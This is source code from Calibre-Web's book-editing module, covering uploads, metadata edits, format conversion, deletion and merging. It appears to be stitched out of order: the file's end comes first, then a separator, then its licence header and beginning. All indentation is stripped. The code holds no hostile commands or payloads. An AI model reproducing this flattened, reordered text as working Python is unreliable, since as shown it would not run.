book.last_modified = datetime.utcnow()
calibre_db.session.merge(book)
calibre_db.session.commit()
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if "detail_view" in to_save:
return redirect(url_for('web.show_book', book_id=book.id))
else:
flash(_("Metadata successfully updated"), category="success")
return render_edit_book(book_id)
else:
calibre_db.session.rollback()
flash(error, category="error")
return render_edit_book(book_id)
except Exception as ex:
log.debug_or_exception(ex)
calibre_db.session.rollback()
flash(_("Error editing book, please check logfile for details"), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
def merge_metadata(to_save, meta):
if to_save['author_name'] == _(u'Unknown'):
to_save['author_name'] = ''
if to_save['book_title'] == _(u'Unknown'):
to_save['book_title'] = ''
for s_field, m_field in [
('tags', 'tags'), ('author_name', 'author'), ('series', 'series'),
('series_index', 'series_id'), ('languages', 'languages'),
('book_title', 'title')]:
to_save[s_field] = to_save[s_field] or getattr(meta, m_field, '')
to_save["description"] = to_save["description"] or Markup(
getattr(meta, 'description', '')).unescape()
def identifier_list(to_save, book):
"""Generate a list of Identifiers from form information"""
id_type_prefix = 'identifier-type-'
id_val_prefix = 'identifier-val-'
result = []
for type_key, type_value in to_save.items():
if not type_key.startswith(id_type_prefix):
continue
val_key = id_val_prefix + type_key[len(id_type_prefix):]
if val_key not in to_save.keys():
continue
result.append(db.Identifiers(to_save[val_key], type_value, book.id))
return result
def prepare_authors_on_upload(title, authr):
if title != _(u'Unknown') and authr != _(u'Unknown'):
entry = calibre_db.check_exists_book(authr, title)
if entry:
log.info("Uploaded book probably exists in library")
flash(_(u"Uploaded book probably exists in the library, consider to change before upload new: ")
+ Markup(render_title_template('book_exists_flash.html', entry=entry)), category="warning")
# handle authors
input_authors = authr.split('&')
# handle_authors(input_authors)
input_authors = list(map(lambda it: it.strip().replace(',', '|'), input_authors))
# Remove duplicates in authors list
input_authors = helper.uniq(input_authors)
# we have all author names now
if input_authors == ['']:
input_authors = [_(u'Unknown')] # prevent empty Author
sort_authors_list = list()
db_author = None
for inp in input_authors:
stored_author = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
if not stored_author:
if not db_author:
db_author = db.Authors(inp, helper.get_sorted_author(inp), "")
calibre_db.session.add(db_author)
calibre_db.session.commit()
sort_author = helper.get_sorted_author(inp)
else:
if not db_author:
db_author = stored_author
sort_author = stored_author.sort
sort_authors_list.append(sort_author)
sort_authors = ' & '.join(sort_authors_list)
return sort_authors, input_authors, db_author
def create_book_on_upload(modif_date, meta):
title = meta.title
authr = meta.author
sort_authors, input_authors, db_author = prepare_authors_on_upload(title, authr)
title_dir = helper.get_valid_filename(title)
author_dir = helper.get_valid_filename(db_author.name)
# combine path and normalize path from windows systems
path = os.path.join(author_dir, title_dir).replace('\\', '/')
# Calibre adds books with utc as timezone
db_book = db.Books(title, "", sort_authors, datetime.utcnow(), datetime(101, 1, 1),
'1', datetime.utcnow(), path, meta.cover, db_author, [], "")
modif_date |= modify_database_object(input_authors, db_book.authors, db.Authors, calibre_db.session,
'author')
# Add series_index to book
modif_date |= edit_book_series_index(meta.series_id, db_book)
# add languages
modif_date |= edit_book_languages(meta.languages, db_book, upload=True)
# handle tags
modif_date |= edit_book_tags(meta.tags, db_book)
# handle publisher
modif_date |= edit_book_publisher(meta.publisher, db_book)
# handle series
modif_date |= edit_book_series(meta.series, db_book)
# Add file to book
file_size = os.path.getsize(meta.file_path)
db_data = db.Data(db_book, meta.extension.upper()[1:], file_size, title_dir)
db_book.data.append(db_data)
calibre_db.session.add(db_book)
# flush content, get db_book.id available
calibre_db.session.flush()
return db_book, input_authors, title_dir
def file_handling_on_upload(requested_file):
# check if file extension is correct
if '.' in requested_file.filename:
file_ext = requested_file.filename.rsplit('.', 1)[-1].lower()
if file_ext not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
flash(
_("File extension '%(ext)s' is not allowed to be uploaded to this server",
ext=file_ext), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
else:
flash(_('File to be uploaded must have an extension'), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
# extract metadata from file
try:
meta = uploader.upload(requested_file, config.config_rarfile_location)
except (IOError, OSError):
log.error("File %s could not saved to temp dir", requested_file.filename)
flash(_(u"File %(filename)s could not saved to temp dir",
filename=requested_file.filename), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
return meta, None
def move_coverfile(meta, db_book):
# move cover to final directory, including book id
if meta.cover:
coverfile = meta.cover
else:
coverfile = os.path.join(constants.STATIC_DIR, 'generic_cover.jpg')
new_coverpath = os.path.join(config.config_calibre_dir, db_book.path, "cover.jpg")
try:
copyfile(coverfile, new_coverpath)
if meta.cover:
os.unlink(meta.cover)
except OSError as e:
log.error("Failed to move cover file %s: %s", new_coverpath, e)
flash(_(u"Failed to Move Cover File %(file)s: %(error)s", file=new_coverpath,
error=e),
category="error")
@editbook.route("/upload", methods=["GET", "POST"])
@login_required_if_no_ano
@upload_required
def upload():
if not config.config_uploading:
abort(404)
if request.method == 'POST' and 'btn-upload' in request.files:
for requested_file in request.files.getlist("btn-upload"):
try:
modif_date = False
# create the function for sorting...
calibre_db.update_title_sort(config)
calibre_db.session.connection().connection.connection.create_function('uuid4', 0, lambda: str(uuid4()))
meta, error = file_handling_on_upload(requested_file)
if error:
return error
db_book, input_authors, title_dir = create_book_on_upload(modif_date, meta)
# Comments needs book id therefore only possible after flush
modif_date |= edit_book_comments(Markup(meta.description).unescape(), db_book)
book_id = db_book.id
title = db_book.title
error = helper.update_dir_structure_file(book_id,
config.config_calibre_dir,
input_authors[0],
meta.file_path,
title_dir + meta.extension.lower())
move_coverfile(meta, db_book)
# save data to database, reread data
calibre_db.session.commit()
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if error:
flash(error, category="error")
uploadText=_(u"File %(file)s uploaded", file=title)
WorkerThread.add(current_user.name, TaskUpload(
"<a href=\"" + url_for('web.show_book', book_id=book_id) + "\">" + uploadText + "</a>"))
if len(request.files.getlist("btn-upload")) < 2:
if current_user.role_edit() or current_user.role_admin():
resp = {"location": url_for('editbook.edit_book', book_id=book_id)}
return Response(json.dumps(resp), mimetype='application/json')
else:
resp = {"location": url_for('web.show_book', book_id=book_id)}
return Response(json.dumps(resp), mimetype='application/json')
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
log.error("Database error: %s", e)
flash(_(u"Database error: %(error)s.", error=e), category="error")
return Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
@editbook.route("/admin/book/convert/<int:book_id>", methods=['POST'])
@login_required_if_no_ano
@edit_required
def convert_bookformat(book_id):
# check to see if we have form fields to work with - if not send user back
book_format_from = request.form.get('book_format_from', None)
book_format_to = request.form.get('book_format_to', None)
if (book_format_from is None) or (book_format_to is None):
flash(_(u"Source or destination format for conversion missing"), category="error")
return redirect(url_for('editbook.edit_book', book_id=book_id))
log.info('converting: book id: %s from: %s to: %s', book_id, book_format_from, book_format_to)
rtn = helper.convert_book_format(book_id, config.config_calibre_dir, book_format_from.upper(),
book_format_to.upper(), current_user.name)
if rtn is None:
flash(_(u"Book successfully queued for converting to %(book_format)s",
book_format=book_format_to),
category="success")
else:
flash(_(u"There was an error converting this book: %(res)s", res=rtn), category="error")
return redirect(url_for('editbook.edit_book', book_id=book_id))
@editbook.route("/scholarsearch/<query>",methods=['GET'])
@login_required_if_no_ano
@edit_required
def scholar_search(query):
if have_scholar:
scholar_gen = scholarly.search_pubs(' '.join(query.split('+')))
i=0
result = []
for publication in scholar_gen:
del publication['source']
result.append(publication)
i+=1
if(i>=10):
break
return Response(json.dumps(result),mimetype='application/json')
else:
return "[]"
@editbook.route("/ajax/editbooks/<param>", methods=['POST'])
@login_required_if_no_ano
@edit_required
def edit_list_book(param):
vals = request.form.to_dict()
book = calibre_db.get_book(vals['pk'])
ret = ""
if param =='series_index':
edit_book_series_index(vals['value'], book)
ret = Response(json.dumps({'success': True, 'newValue': book.series_index}), mimetype='application/json')
elif param =='tags':
edit_book_tags(vals['value'], book)
ret = Response(json.dumps({'success': True, 'newValue': ', '.join([tag.name for tag in book.tags])}),
mimetype='application/json')
elif param =='series':
edit_book_series(vals['value'], book)
ret = Response(json.dumps({'success': True, 'newValue': ', '.join([serie.name for serie in book.series])}),
mimetype='application/json')
elif param =='publishers':
edit_book_publisher(vals['value'], book)
ret = Response(json.dumps({'success': True,
'newValue': ', '.join([publisher.name for publisher in book.publishers])}),
mimetype='application/json')
elif param =='languages':
invalid = list()
edit_book_languages(vals['value'], book, invalid=invalid)
if invalid:
ret = Response(json.dumps({'success': False,
'msg': 'Invalid languages in request: {}'.format(','.join(invalid))}),
mimetype='application/json')
else:
lang_names = list()
for lang in book.languages:
try:
lang_names.append(LC.parse(lang.lang_code).get_language_name(get_locale()))
except UnknownLocaleError:
lang_names.append(_(isoLanguages.get(part3=lang.lang_code).name))
ret = Response(json.dumps({'success': True, 'newValue': ', '.join(lang_names)}),
mimetype='application/json')
elif param =='author_sort':
book.author_sort = vals['value']
ret = Response(json.dumps({'success': True, 'newValue': book.author_sort}),
mimetype='application/json')
elif param == 'title':
sort = book.sort
handle_title_on_edit(book, vals.get('value', ""))
helper.update_dir_stucture(book.id, config.config_calibre_dir)
ret = Response(json.dumps({'success': True, 'newValue': book.title}),
mimetype='application/json')
elif param =='sort':
book.sort = vals['value']
ret = Response(json.dumps({'success': True, 'newValue': book.sort}),
mimetype='application/json')
elif param =='authors':
input_authors, __ = handle_author_on_edit(book, vals['value'], vals.get('checkA', None) == "true")
helper.update_dir_stucture(book.id, config.config_calibre_dir, input_authors[0])
ret = Response(json.dumps({'success': True,
'newValue': ' & '.join([author.replace('|',',') for author in input_authors])}),
mimetype='application/json')
book.last_modified = datetime.utcnow()
try:
calibre_db.session.commit()
# revert change for sort if automatic fields link is deactivated
if param == 'title' and vals.get('checkT') == "false":
book.sort = sort
calibre_db.session.commit()
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
log.error("Database error: %s", e)
return ret
@editbook.route("/ajax/sort_value/<field>/<int:bookid>")
@login_required
def get_sorted_entry(field, bookid):
if field in ['title', 'authors', 'sort', 'author_sort']:
book = calibre_db.get_filtered_book(bookid)
if book:
if field == 'title':
return json.dumps({'sort': book.sort})
elif field == 'authors':
return json.dumps({'author_sort': book.author_sort})
if field == 'sort':
return json.dumps({'sort': book.title})
if field == 'author_sort':
return json.dumps({'author_sort': book.author})
return ""
@editbook.route("/ajax/simulatemerge", methods=['POST'])
@login_required
@edit_required
def simulate_merge_list_book():
vals = request.get_json().get('Merge_books')
if vals:
to_book = calibre_db.get_book(vals[0]).title
vals.pop(0)
if to_book:
for book_id in vals:
from_book = []
from_book.append(calibre_db.get_book(book_id).title)
return json.dumps({'to': to_book, 'from': from_book})
return ""
@editbook.route("/ajax/mergebooks", methods=['POST'])
@login_required
@edit_required
def merge_list_book():
vals = request.get_json().get('Merge_books')
to_file = list()
if vals:
# load all formats from target book
to_book = calibre_db.get_book(vals[0])
vals.pop(0)
if to_book:
for file in to_book.data:
to_file.append(file.format)
to_name = helper.get_valid_filename(to_book.title) + ' - ' + \
helper.get_valid_filename(to_book.authors[0].name)
for book_id in vals:
from_book = calibre_db.get_book(book_id)
if from_book:
for element in from_book.data:
if element.format not in to_file:
# create new data entry with: book_id, book_format, uncompressed_size, name
filepath_new = os.path.normpath(os.path.join(config.config_calibre_dir,
to_book.path,
to_name + "." + element.format.lower()))
filepath_old = os.path.normpath(os.path.join(config.config_calibre_dir,
from_book.path,
element.name + "." + element.format.lower()))
copyfile(filepath_old, filepath_new)
to_book.data.append(db.Data(to_book.id,
element.format,
element.uncompressed_size,
to_name))
delete_book(from_book.id,"", True)
return json.dumps({'success': True})
return ""
@editbook.route("/ajax/xchange", methods=['POST'])
@login_required
@edit_required
def table_xchange_author_title():
vals = request.get_json().get('xchange')
if vals:
for val in vals:
modif_date = False
book = calibre_db.get_book(val)
authors = book.title
entries = calibre_db.order_authors(book)
author_names = []
for authr in entries.authors:
author_names.append(authr.name.replace('|', ','))
title_change = handle_title_on_edit(book, " ".join(author_names))
input_authors, authorchange = handle_author_on_edit(book, authors)
if authorchange or title_change:
edited_books_id = book.id
modif_date = True
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if edited_books_id:
helper.update_dir_stucture(edited_books_id, config.config_calibre_dir, input_authors[0])
if modif_date:
book.last_modified = datetime.utcnow()
try:
calibre_db.session.commit()
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
log.error("Database error: %s", e)
return json.dumps({'success': False})
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
return json.dumps({'success': True})
return ""
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
from shutil import copyfile
from uuid import uuid4
from lxml.html.clean import clean_html
# Improve this to check if scholarly is available in a global way, like other pythonic libraries
try:
from scholarly import scholarly
have_scholar = True
except ImportError:
have_scholar = False
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, request, flash, redirect, url_for, abort, Markup, Response
from flask_babel import gettext as _
from flask_login import current_user, login_required
from sqlalchemy.exc import OperationalError, IntegrityError
from sqlite3 import OperationalError as sqliteOperationalError
from . import constants, logger, isoLanguages, gdriveutils, uploader, helper
from . import config, get_locale, ub, db
from . import calibre_db
from .services.worker import WorkerThread
from .tasks.upload import TaskUpload
from .render_template import render_title_template
from .usermanagement import login_required_if_no_ano
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
editbook = Blueprint('editbook', __name__)
log = logger.create()
def upload_required(f):
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_upload() or current_user.role_admin():
return f(*args, **kwargs)
abort(403)
return inner
def edit_required(f):
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_edit() or current_user.role_admin():
return f(*args, **kwargs)
abort(403)
return inner
def search_objects_remove(db_book_object, db_type, input_elements):
del_elements = []
for c_elements in db_book_object:
found = False
if db_type == 'languages':
type_elements = c_elements.lang_code
elif db_type == 'custom':
type_elements = c_elements.value
else:
type_elements = c_elements.name
for inp_element in input_elements:
if inp_element.lower() == type_elements.lower():
# if inp_element == type_elements:
found = True
break
# if the element was not found in the new list, add it to remove list
if not found:
del_elements.append(c_elements)
return del_elements
def search_objects_add(db_book_object, db_type, input_elements):
add_elements = []
for inp_element in input_elements:
found = False
for c_elements in db_book_object:
if db_type == 'languages':
type_elements = c_elements.lang_code
elif db_type == 'custom':
type_elements = c_elements.value
else:
type_elements = c_elements.name
if inp_element == type_elements:
found = True
break
if not found:
add_elements.append(inp_element)
return add_elements
def remove_objects(db_book_object, db_session, del_elements):
changed = False
if len(del_elements) > 0:
for del_element in del_elements:
db_book_object.remove(del_element)
changed = True
if len(del_element.books) == 0:
db_session.delete(del_element)
return changed
def add_objects(db_book_object, db_object, db_session, db_type, add_elements):
changed = False
if db_type == 'languages':
db_filter = db_object.lang_code
elif db_type == 'custom':
db_filter = db_object.value
else:
db_filter = db_object.name
for add_element in add_elements:
# check if a element with that name exists
db_element = db_session.query(db_object).filter(db_filter == add_element).first()
# if no element is found add it
# if new_element is None:
if db_type == 'author':
new_element = db_object(add_element, helper.get_sorted_author(add_element.replace('|', ',')), "")
elif db_type == 'series':
new_element = db_object(add_element, add_element)
elif db_type == 'custom':
new_element = db_object(value=add_element)
elif db_type == 'publisher':
new_element = db_object(add_element, None)
else: # db_type should be tag or language
new_element = db_object(add_element)
if db_element is None:
changed = True
db_session.add(new_element)
db_book_object.append(new_element)
else:
db_element = create_objects_for_addition(db_element, add_element, db_type)
changed = True
# add element to book
changed = True
db_book_object.append(db_element)
return changed
def create_objects_for_addition(db_element, add_element, db_type):
if db_type == 'custom':
if db_element.value != add_element:
db_element.value = add_element # ToDo: Before new_element, but this is not plausible
elif db_type == 'languages':
if db_element.lang_code != add_element:
db_element.lang_code = add_element
elif db_type == 'series':
if db_element.name != add_element:
db_element.name = add_element
db_element.sort = add_element
elif db_type == 'author':
if db_element.name != add_element:
db_element.name = add_element
db_element.sort = add_element.replace('|', ',')
elif db_type == 'publisher':
if db_element.name != add_element:
db_element.name = add_element
db_element.sort = None
elif db_element.name != add_element:
db_element.name = add_element
return db_element
# Modifies different Database objects, first check if elements if elements have to be deleted,
# because they are no longer used, than check if elements have to be added to database
def modify_database_object(input_elements, db_book_object, db_object, db_session, db_type):
# passing input_elements not as a list may lead to undesired results
if not isinstance(input_elements, list):
raise TypeError(str(input_elements) + " should be passed as a list")
input_elements = [x for x in input_elements if x != '']
# we have all input element (authors, series, tags) names now
# 1. search for elements to remove
del_elements = search_objects_remove(db_book_object, db_type, input_elements)
# 2. search for elements that need to be added
add_elements = search_objects_add(db_book_object, db_type, input_elements)
# if there are elements to remove, we remove them now
changed = remove_objects(db_book_object, db_session, del_elements)
# if there are elements to add, we add them now!
if len(add_elements) > 0:
changed |= add_objects(db_book_object, db_object, db_session, db_type, add_elements)
return changed
def modify_identifiers(input_identifiers, db_identifiers, db_session):
"""Modify Identifiers to match input information.
input_identifiers is a list of read-to-persist Identifiers objects.
db_identifiers is a list of already persisted list of Identifiers objects."""
changed = False
error = False
input_dict = dict([(identifier.type.lower(), identifier) for identifier in input_identifiers])
if len(input_identifiers) != len(input_dict):
error = True
db_dict = dict([(identifier.type.lower(), identifier) for identifier in db_identifiers ])
# delete db identifiers not present in input or modify them with input val
for identifier_type, identifier in db_dict.items():
if identifier_type not in input_dict.keys():
db_session.delete(identifier)
changed = True
else:
input_identifier = input_dict[identifier_type]
identifier.type = input_identifier.type
identifier.val = input_identifier.val
# add input identifiers not present in db
for identifier_type, identifier in input_dict.items():
if identifier_type not in db_dict.keys():
db_session.add(identifier)
changed = True
return changed, error
@editbook.route("/ajax/delete/<int:book_id>")
@login_required
def delete_book_from_details(book_id):
return Response(delete_book(book_id, "", True), mimetype='application/json')
@editbook.route("/delete/<int:book_id>", defaults={'book_format': ""})
@editbook.route("/delete/<int:book_id>/<string:book_format>")
@login_required
def delete_book_ajax(book_id, book_format):
return delete_book(book_id, book_format, False)
def delete_whole_book(book_id, book):
# delete book from Shelfs, Downloads, Read list
ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == book_id).delete()
ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == book_id).delete()
ub.delete_download(book_id)
ub.session_commit()
# check if only this book links to:
# author, language, series, tags, custom columns
modify_database_object([u''], book.authors, db.Authors, calibre_db.session, 'author')
modify_database_object([u''], book.tags, db.Tags, calibre_db.session, 'tags')
modify_database_object([u''], book.series, db.Series, calibre_db.session, 'series')
modify_database_object([u''], book.languages, db.Languages, calibre_db.session, 'languages')
modify_database_object([u''], book.publishers, db.Publishers, calibre_db.session, 'publishers')
cc = calibre_db.session.query(db.Custom_Columns). \
filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
for c in cc:
cc_string = "custom_column_" + str(c.id)
if not c.is_multiple:
if len(getattr(book, cc_string)) > 0:
if c.datatype == 'bool' or c.datatype == 'integer' or c.datatype == 'float':
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
log.debug('remove ' + str(c.id))
calibre_db.session.delete(del_cc)
calibre_db.session.commit()
elif c.datatype == 'rating':
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
if len(del_cc.books) == 0:
log.debug('remove ' + str(c.id))
calibre_db.session.delete(del_cc)
calibre_db.session.commit()
else:
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
log.debug('remove ' + str(c.id))
calibre_db.session.delete(del_cc)
calibre_db.session.commit()
else:
modify_database_object([u''], getattr(book, cc_string), db.cc_classes[c.id],
calibre_db.session, 'custom')
calibre_db.session.query(db.Books).filter(db.Books.id == book_id).delete()
def render_delete_book_result(book_format, jsonResponse, warning, book_id):
if book_format:
if jsonResponse:
return json.dumps([warning, {"location": url_for("editbook.edit_book", book_id=book_id),
"type": "success",
"format": book_format,
"message": _('Book Format Successfully Deleted')}])
else:
flash(_('Book Format Successfully Deleted'), category="success")
return redirect(url_for('editbook.edit_book', book_id=book_id))
else:
if jsonResponse:
return json.dumps([warning, {"location": url_for('web.index'),
"type": "success",
"format": book_format,
"message": _('Book Successfully Deleted')}])
else:
flash(_('Book Successfully Deleted'), category="success")
return redirect(url_for('web.index'))
def delete_book(book_id, book_format, jsonResponse):
warning = {}
if current_user.role_delete_books():
book = calibre_db.get_book(book_id)
if book:
try:
result, error = helper.delete_book(book, config.config_calibre_dir, book_format=book_format.upper())
if not result:
if jsonResponse:
return json.dumps([{"location": url_for("editbook.edit_book", book_id=book_id),
"type": "danger",
"format": "",
"message": error}])
else:
flash(error, category="error")
return redirect(url_for('editbook.edit_book', book_id=book_id))
if error:
if jsonResponse:
warning = {"location": url_for("editbook.edit_book", book_id=book_id),
"type": "warning",
"format": "",
"message": error}
else:
flash(error, category="warning")
if not book_format:
delete_whole_book(book_id, book)
else:
calibre_db.session.query(db.Data).filter(db.Data.book == book.id).\
filter(db.Data.format == book_format).delete()
calibre_db.session.commit()
except Exception as ex:
log.debug_or_exception(ex)
calibre_db.session.rollback()
if jsonResponse:
return json.dumps([{"location": url_for("editbook.edit_book", book_id=book_id),
"type": "danger",
"format": "",
"message": ex}])
else:
flash(str(ex), category="error")
return redirect(url_for('editbook.edit_book', book_id=book_id))
else:
# book not found
log.error('Book with id "%s" could not be deleted: not found', book_id)
return render_delete_book_result(book_format, jsonResponse, warning, book_id)
def render_edit_book(book_id):
cc = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
book = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
if not book:
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
for lang in book.languages:
lang.language_name = isoLanguages.get_language_name(get_locale(), lang.lang_code)
book = calibre_db.order_authors(book)
author_names = []
for authr in book.authors:
author_names.append(authr.name.replace('|', ','))
# Option for showing convertbook button
valid_source_formats=list()
allowed_conversion_formats = list()
kepub_possible=None
if config.config_converterpath:
for file in book.data:
if file.format.lower() in constants.EXTENSIONS_CONVERT_FROM:
valid_source_formats.append(file.format.lower())
if config.config_kepubifypath and 'epub' in [file.format.lower() for file in book.data]:
kepub_possible = True
if not config.config_converterpath:
valid_source_formats.append('epub')
# Determine what formats don't already exist
if config.config_converterpath:
allowed_conversion_formats = constants.EXTENSIONS_CONVERT_TO[:]
for file in book.data:
if file.format.lower() in allowed_conversion_formats:
allowed_conversion_formats.remove(file.format.lower())
if kepub_possible:
allowed_conversion_formats.append('kepub')
return render_title_template('book_edit.html', book=book, authors=author_names, cc=cc,
title=_(u"edit metadata"), page="editbook",
conversion_formats=allowed_conversion_formats,
config=config,
source_formats=valid_source_formats)
def edit_book_ratings(to_save, book):
changed = False
if to_save["rating"].strip():
old_rating = False
if len(book.ratings) > 0:
old_rating = book.ratings[0].rating
ratingx2 = int(float(to_save["rating"]) * 2)
if ratingx2 != old_rating:
changed = True
is_rating = calibre_db.session.query(db.Ratings).filter(db.Ratings.rating == ratingx2).first()
if is_rating:
book.ratings.append(is_rating)
else:
new_rating = db.Ratings(rating=ratingx2)
book.ratings.append(new_rating)
if old_rating:
book.ratings.remove(book.ratings[0])
else:
if len(book.ratings) > 0:
book.ratings.remove(book.ratings[0])
changed = True
return changed
def edit_book_tags(tags, book):
input_tags = tags.split(',')
input_tags = list(map(lambda it: it.strip(), input_tags))
# Remove duplicates
input_tags = helper.uniq(input_tags)
return modify_database_object(input_tags, book.tags, db.Tags, calibre_db.session, 'tags')
def edit_book_series(series, book):
input_series = [series.strip()]
input_series = [x for x in input_series if x != '']
return modify_database_object(input_series, book.series, db.Series, calibre_db.session, 'series')
def edit_book_series_index(series_index, book):
# Add default series_index to book
modif_date = False
series_index = series_index or '1'
if not series_index.replace('.', '', 1).isdigit():
flash(_("%(seriesindex)s is not a valid number, skipping", seriesindex=series_index), category="warning")
return False
if book.series_index != series_index:
book.series_index = series_index
modif_date = True
return modif_date
# Handle book comments/description
def edit_book_comments(comments, book):
modif_date = False
if comments:
comments = clean_html(comments)
if len(book.comments):
if book.comments[0].text != comments:
book.comments[0].text = clean_html(comments)
modif_date = True
else:
if comments:
book.comments.append(db.Comments(text=comments, book=book.id))
modif_date = True
return modif_date
def edit_book_languages(languages, book, upload=False, invalid=None):
input_languages = languages.split(',')
unknown_languages = []
if not upload:
input_l = isoLanguages.get_language_codes(get_locale(), input_languages, unknown_languages)
else:
input_l = isoLanguages.get_valid_language_codes(get_locale(), input_languages, unknown_languages)
for l in unknown_languages:
log.error('%s is not a valid language', l)
if isinstance(invalid, list):
invalid.append(l)
else:
flash(_(u"%(langname)s is not a valid language", langname=l), category="warning")
# ToDo: Not working correct
if upload and len(input_l) == 1:
# If the language of the file is excluded from the users view, it's not imported, to allow the user to view
# the book it's language is set to the filter language
if input_l[0] != current_user.filter_language() and current_user.filter_language() != "all":
input_l[0] = calibre_db.session.query(db.Languages). \
filter(db.Languages.lang_code == current_user.filter_language()).first().lang_code
# Remove duplicates
input_l = helper.uniq(input_l)
return modify_database_object(input_l, book.languages, db.Languages, calibre_db.session, 'languages')
def edit_book_publisher(publishers, book):
changed = False
if publishers:
publisher = publishers.rstrip().strip()
if len(book.publishers) == 0 or (len(book.publishers) > 0 and publisher != book.publishers[0].name):
changed |= modify_database_object([publisher], book.publishers, db.Publishers, calibre_db.session,
'publisher')
elif len(book.publishers):
changed |= modify_database_object([], book.publishers, db.Publishers, calibre_db.session, 'publisher')
return changed
def edit_cc_data_value(book_id, book, c, to_save, cc_db_value, cc_string):
changed = False
if to_save[cc_string] == 'None':
to_save[cc_string] = None
elif c.datatype == 'bool':
to_save[cc_string] = 1 if to_save[cc_string] == 'True' else 0
elif c.datatype == 'comments':
to_save[cc_string] = Markup(to_save[cc_string]).unescape()
if to_save[cc_string]:
to_save[cc_string] = clean_html(to_save[cc_string])
elif c.datatype == 'datetime':
try:
to_save[cc_string] = datetime.strptime(to_save[cc_string], "%Y-%m-%d")
except ValueError:
to_save[cc_string] = db.Books.DEFAULT_PUBDATE
if to_save[cc_string] != cc_db_value:
if cc_db_value is not None:
if to_save[cc_string] is not None:
setattr(getattr(book, cc_string)[0], 'value', to_save[cc_string])
changed = True
else:
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
calibre_db.session.delete(del_cc)
changed = True
else:
cc_class = db.cc_classes[c.id]
new_cc = cc_class(value=to_save[cc_string], book=book_id)
calibre_db.session.add(new_cc)
changed = True
return changed, to_save
def edit_cc_data_string(book, c, to_save, cc_db_value, cc_string):
changed = False
if c.datatype == 'rating':
to_save[cc_string] = str(int(float(to_save[cc_string]) * 2))
if to_save[cc_string].strip() != cc_db_value:
if cc_db_value is not None:
# remove old cc_val
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
if len(del_cc.books) == 0:
calibre_db.session.delete(del_cc)
changed = True
cc_class = db.cc_classes[c.id]
new_cc = calibre_db.session.query(cc_class).filter(
cc_class.value == to_save[cc_string].strip()).first()
# if no cc val is found add it
if new_cc is None:
new_cc = cc_class(value=to_save[cc_string].strip())
calibre_db.session.add(new_cc)
changed = True
calibre_db.session.flush()
new_cc = calibre_db.session.query(cc_class).filter(
cc_class.value == to_save[cc_string].strip()).first()
# add cc value to book
getattr(book, cc_string).append(new_cc)
return changed, to_save
def edit_cc_data(book_id, book, to_save):
changed = False
cc = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
for c in cc:
cc_string = "custom_column_" + str(c.id)
if not c.is_multiple:
if len(getattr(book, cc_string)) > 0:
cc_db_value = getattr(book, cc_string)[0].value
else:
cc_db_value = None
if to_save[cc_string].strip():
if c.datatype in ['int', 'bool', 'float', "datetime", "comments"]:
changed, to_save = edit_cc_data_value(book_id, book, c, to_save, cc_db_value, cc_string)
else:
changed, to_save = edit_cc_data_string(book, c, to_save, cc_db_value, cc_string)
else:
if cc_db_value is not None:
# remove old cc_val
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
if not del_cc.books or len(del_cc.books) == 0:
calibre_db.session.delete(del_cc)
changed = True
else:
input_tags = to_save[cc_string].split(',')
input_tags = list(map(lambda it: it.strip(), input_tags))
changed |= modify_database_object(input_tags,
getattr(book, cc_string),
db.cc_classes[c.id],
calibre_db.session,
'custom')
return changed
def upload_single_file(request, book, book_id):
# Check and handle Uploaded file
if 'btn-upload-format' in request.files:
requested_file = request.files['btn-upload-format']
# check for empty request
if requested_file.filename != '':
if not current_user.role_upload():
abort(403)
if '.' in requested_file.filename:
file_ext = requested_file.filename.rsplit('.', 1)[-1].lower()
